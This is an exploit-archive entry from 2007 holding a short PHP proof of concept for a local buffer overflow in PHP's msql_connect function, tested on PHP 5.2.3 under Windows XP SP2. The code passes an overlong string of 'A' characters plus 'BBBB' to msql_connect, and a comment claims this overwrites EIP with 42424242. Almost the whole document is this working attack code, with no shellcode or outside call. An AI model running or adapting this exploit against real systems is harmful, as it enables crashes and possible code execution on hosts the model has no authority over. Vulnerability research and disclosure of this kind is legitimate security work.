id: 6430
date: 08/05/2007
title: PHP mSQL (msql_connect) Local Buffer Overflow PoC
author: NetJackal
cves: 

=================================================
PHP mSQL (msql_connect) Local Buffer Overflow PoC
=================================================



<?php

##########################################################
###----------------------------------------------------###
###----PHP mSQL (msql_connect) Buffer Overflow PoC-----###
###----------------------------------------------------###
###-Tested on 5.2.3 (XP SP2)---------------------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!function_exists('msql_connect'))
die('mSQL extension is not available');

#msql_pconnect(str_repeat('A',49424).'BBBB');

msql_connect(str_repeat('A',49424).'BBBB'); # EIP => 42424242

?>



#  0day.today [2023-03-23]  #